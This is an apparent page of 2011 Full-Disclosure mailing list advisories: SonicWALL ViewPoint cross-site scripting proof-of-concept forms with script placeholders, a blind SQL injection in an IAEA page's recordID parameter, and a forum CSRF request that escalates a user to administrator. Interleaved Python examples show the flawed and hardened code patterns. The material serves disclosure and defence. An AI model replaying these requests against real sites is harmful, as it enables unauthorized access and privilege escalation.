<input type="hidden" name="page" value="reports/topTenReport.jsp" />
<input type="hidden" name="p" value="7640" />
<input type="hidden" name="action" value="showPage" />
<input type="hidden" name="report_id" value="180" />
<input type="hidden" name="help_url" value="http://help.xxx.com/help.asp?l=INSERT YOUR SCRIPTCODE HERE!" />
<input type="hidden" name="unused" value="1" />
<input type="hidden" name="isTimeBasedReport" value="0" />
<input type="hidden" name="bidirection" value="0">


Section: License Viewpoint
<form method="post" action="login.jsp">
<input type="hidden" name="login" value="1"/>
<input type="hidden" name="url" value="/stats/pdf?sn=INSERT YOUR SCRIPTCODE HERE!">
<input type="hidden" name="sn" value="INSERT YOUR SCRIPTCODE HERE!"/>
Username: <input type="text" name="userName"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>

createDataBox(unescape(''),'','logs','2','284','5','5','Logs<h1>INSERT SCRIPTCODE HERE!','DBC1269337065018005056BA2A2D','0','3','1','null'); -- ;)

References: [x] =
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_action&template_id=100&config_id=7&config_name=facebook&node_id=UT1258498415223005056BA2A2D&successURL=
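The two rendering patterns behind the PoC above, as an added example that is not SonicWALL's code. The request values (wrapped, help_url, sn) are written into HTML attributes; render_hidden_unsafe mirrors that, render_hidden applies attribute encoding at output time, which covers both the reflected case and the stored titles since they pass through the same renderer, and validate_serial shows the allowlist a serial-number parameter like sn can be held to before it ever reaches a template. The function names and the injected value are hypothetical.

```python
import html
import re


def render_hidden_unsafe(name, value):
    """Defective pattern: the request value is dropped into the attribute unchanged,
    so a value containing a double quote closes the attribute and the tag."""
    return f'<input type="hidden" name="{name}" value="{value}" />'


def render_hidden(name, value):
    """Hardened: attribute-encode at output time. quote=True turns both quote
    characters into entities, so the value cannot leave the attribute."""
    return (f'<input type="hidden" name="{html.escape(str(name), quote=True)}" '
            f'value="{html.escape(str(value), quote=True)}" />')


def render_text(value):
    """For values emitted as page text (report, page and log titles): HTML-encode,
    which neutralises a stored title such as Logs<h1>... at the point of output."""
    return html.escape(str(value), quote=False)


SERIAL_RE = re.compile(r"[A-Za-z0-9]{1,40}")


def validate_serial(sn):
    """Allowlist for a serial-number parameter such as sn: anything that is not
    plain alphanumeric is refused before it reaches a template."""
    return isinstance(sn, str) and SERIAL_RE.fullmatch(sn) is not None


TAG_RE = re.compile(r"<[^>]+>")


def count_tags(fragment):
    """Number of HTML tags in a fragment; one rendered input must yield exactly one."""
    return len(TAG_RE.findall(fragment))


# Constructed attacker-shaped value, standing in for "INSERT YOUR SCRIPTCODE HERE!".
CONSTRUCTED_VALUE = '"><b>injected</b><input type="hidden" value="'

if __name__ == "__main__":
    print(render_hidden_unsafe("wrapped", CONSTRUCTED_VALUE))
    print(render_hidden("wrapped", CONSTRUCTED_VALUE))
```

count_tags is the review check: the unsafe renderer turns one hidden field into four tags, the encoded one keeps it at one, and render_text handles the persistent titles (SonicToday page and log titles) that the advisory lists separately but that fail for the same reason.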

[Full-disclosure] IAEA Website Service - Blind SQL Injection Vulnerability

2011-09-25 Thread resea...@vulnerability-lab.com
Title:
==
International Atomic Energy Agency - Blind SQL Injection Vulnerability


Date:
=
2011-09-26



VL-ID:
=
268

Reference:
==
http://www.vulnerability-lab.com/get_content.php?id=268


Introduction:
=
The IAEA was created in 1957 in response to the deep fears and expectations 
resulting from the discovery of nuclear energy. Its 
fortunes are uniquely geared to this controversial technology that can be used 
either as a weapon or as a practical and useful tool.
The Agency s genesis was US President Eisenhower s Atoms for Peace address to 
the General Assembly of the United Nations on 8 
December 1953. These ideas helped to shape the IAEA Statute, which 81 nations 
unanimously approved in October 1956. The Statute 
outlines the three pillars of the Agency s work - nuclear verification and 
security, safety and technology transfer.

(Copy of the Vendor Homepage: http://en.wikipedia.org )


Abstract:
=
An anonymous Vulnerability Laboratory researcher discovered a blind SQL 
Injection vulnerability on the official International Atomic Energy Agency 
vendor website.


Report-Timeline:

2011-09-06: Vendor Notification
2011-09-23: Vendor Response/Feedback
2011-09-24: Vendor Fix/Patch
2011-09-26: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
IAEA Website Service - 2011/Q3


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL Injection Vulnerability is detected on the IAEA vendor website. An 
insecurely handled request parameter allows remote attackers to inject and 
execute their own SQL statements. Successful exploitation of the blind 
injection may result in DBMS compromise, defacement or manipulation of 
service/application content.

Vulnerable Module(s):
[+] /nael/page.php

Vulnerable Para(s): 
[+] recordID=
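The vulnerable and hardened query shapes for a recordID lookup, as an added example that is not the IAEA site's code; the table, its rows and the handler are constructed. The concatenated version shows why the presence or absence of rows gives a blind injection its true/false oracle, the parameterized version binds the value after checking its shape, and the handler returns a uniform 400 with a log line so that rejected requests can be counted by detection rather than answered.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the site's page store."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (recordID INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    con.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                    [(1, "Public page", 1), (2, "Draft page", 0), (3, "Another draft", 0)])
    return con


def lookup_concat(con, record_id):
    """Defective pattern: the request value becomes SQL text, so the client can
    rewrite the WHERE clause. Whether rows come back or not is exactly the
    true/false oracle a blind injection reads."""
    sql = (f"SELECT title FROM pages WHERE published = 1 AND recordID = {record_id} "
           f"ORDER BY recordID")
    return [row[0] for row in con.execute(sql)]


RECORD_ID_RE = re.compile(r"[0-9]{1,9}")


def lookup_param(con, record_id):
    """Hardened: check the shape, then bind the value; it is data, never SQL."""
    if not isinstance(record_id, str) or RECORD_ID_RE.fullmatch(record_id) is None:
        raise ValueError("recordID must be a decimal integer")
    cur = con.execute("SELECT title FROM pages WHERE published = 1 AND recordID = ? "
                      "ORDER BY recordID", (int(record_id),))
    return [row[0] for row in cur]


def handle_request(con, record_id):
    """Handler shape: rejected input gets a uniform 400 plus a log line that a
    detection rule can count, so probing shows up instead of leaking rows."""
    try:
        rows = lookup_param(con, record_id)
    except ValueError as err:
        return {"status": 400, "rows": [], "log": f"rejected recordID={record_id!r}: {err}"}
    return {"status": 200 if rows else 404, "rows": rows, "log": ""}


if __name__ == "__main__":
    db = make_db()
    for rid in ["1", "1 OR 1=1"]:
        print(f"concat   {rid!r:12} -> {lookup_concat(db, rid)}")
        print(f"param    {rid!r:12} -> {handle_request(db, rid)}")
```

With the concatenated query the unpublished drafts come back for a tautology in recordID while a plain "1" returns one row; with the bound parameter the same input never reaches the database at all, which removes the oracle entirely rather than trying to filter individual SQL keywords.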


Picture(s):
../sql_1.png


Risk:
=
The security risk of the blind sql injection vulnerability is estimated as 
critical.


Credits:

Vulnerability Research Laboratory - Mohammed A.A ()


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability-Lab or its suppliers 
have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation of liability for consequential or incidental 
damages so the foregoing limitation may not apply. Any modified copy or 
reproduction, including partially usages, of this file requires authorization 
from Vulnerability-Lab. Permission to electronically redistribute this alert in 
its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab




-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Advanced Electron Forums (AEF) <= 1.0.9 Cross Site Request Forgery (CSRF) Vulnerability

2011-09-25 Thread YGN Ethical Hacker Group
Advanced Electron Forums (AEF) <= 1.0.9 Cross Site Request Forgery
(CSRF) Vulnerability



1. OVERVIEW

Advanced Electron Forums (AEF) versions 1.0.9 and earlier are vulnerable
to Cross Site Request Forgery (CSRF).


2. BACKGROUND

AEF has a very simple and easy to use Administration Panel and
installing this software is a piece of cake! You can install new
themes, customize themes the way you want. The User Control Panel has
a simple yet beautiful interface where users can set their preferences
for the board.


3. VULNERABILITY DESCRIPTION

Advanced Electron Forums (AEF) versions 1.0.9 and earlier contain a flaw that
allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The
flaw exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for the majority of
administrator functions, such as adding a new user or assigning
administrative privileges to a user. By using a crafted URL, an attacker may
trick the victim into visiting his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

<= 1.0.9


5. PROOF-OF-CONCEPT/EXPLOIT

The following request escalates a normal user to an administrator.

[REQUEST]
POST /aef/index.php?act=editprofile&uid=2 HTTP/1.1

username=tester&email=tester%40yehg.net&u_member_group=1&realname=&title=&location=&gender=1&privatetext=&icq=&yim=&msn=&aim=&www=&sig=&editprofile=Edit+Profile
[/REQUEST]


6. SOLUTION

Partial fix is available.
The vendor released a single patch for the provided vulnerable
EditProfile functionality.
http://www.anelectron.com/downloads/index.php?act=downloadattach&atid=59
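A synchronizer-token check, one standard mitigation for the flaw described above, as an added example that is not AEF's code. The session store, the forum origin and the handler are hypothetical; the request body is the one from the PoC, and because a cross-site page cannot read the victim's token, a submission without it (or with a guessed one) is refused before any field is applied.

```python
import hmac
import secrets
from urllib.parse import parse_qs

FORUM_ORIGIN = "https://forum.example"      # assumed origin of the forum itself


class Session:
    """Minimal server-side session: one unguessable token per session."""
    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)


def form_token_field(session):
    """Hidden field the Edit Profile form must include; the token is tied to
    the session cookie and is not visible to another origin."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}" />'


def verify_csrf(session, body, origin=None):
    """Return (ok, reason). The token is compared in constant time; when the
    browser sent an Origin header it must also match the forum's own origin."""
    fields = parse_qs(body, keep_blank_values=True)
    token = fields.get("csrf_token", [""])[0]
    if not token:
        return False, "missing csrf_token"
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False, "csrf_token mismatch"
    if origin is not None and origin != FORUM_ORIGIN:
        return False, f"origin {origin} does not match {FORUM_ORIGIN}"
    return True, "ok"


def edit_profile(session, body, origin=None):
    """Handler shape for POST index.php?act=editprofile: the CSRF check runs
    before any field is applied, and a failure changes nothing."""
    ok, reason = verify_csrf(session, body, origin)
    if not ok:
        return {"status": 403, "reason": reason}
    fields = parse_qs(body, keep_blank_values=True)
    return {"status": 200, "u_member_group": fields.get("u_member_group", [""])[0]}


# The advisory's request body (no token), as a cross-site page would submit it.
POC_BODY = ("username=tester&email=tester%40yehg.net&u_member_group=1&realname=&title="
            "&location=&gender=1&privatetext=&icq=&yim=&msn=&aim=&www=&sig=&editprofile=Edit+Profile")


def with_token(body, token):
    """Append the token the forum's own form would carry."""
    return f"{body}&csrf_token={token}"


if __name__ == "__main__":
    sess = Session()
    print(form_token_field(sess))
    print("PoC body, no token:", edit_profile(sess, POC_BODY))
    print("own form, token:   ", edit_profile(sess, with_token(POC_BODY, sess.csrf_token), FORUM_ORIGIN))
```

The Origin check is a second, independent layer: modern browsers attach Origin to cross-site POSTs, so even a token leak would still need the request to come from the forum's own pages.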


7. VENDOR

Electron Inc.
http://www.anelectron.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor through email, website contact form submission
2011-05-17: vendor released aef 1.0.9 without the CSRF fix
2011-09-06: vendor released separate patch about the CSRF fix
2011-09-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[aef-1.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery



#yehg [2011-09-26]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread Valdis . Kletnieks
On Mon, 26 Sep 2011 01:36:13 -, Thor (Hammer of God) said:
 Certainly possible, but the developer would have to go out of their way to
 screw that up.

Yes, but doesn't that sentence describe like 75% of all the CVE's out there? :)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/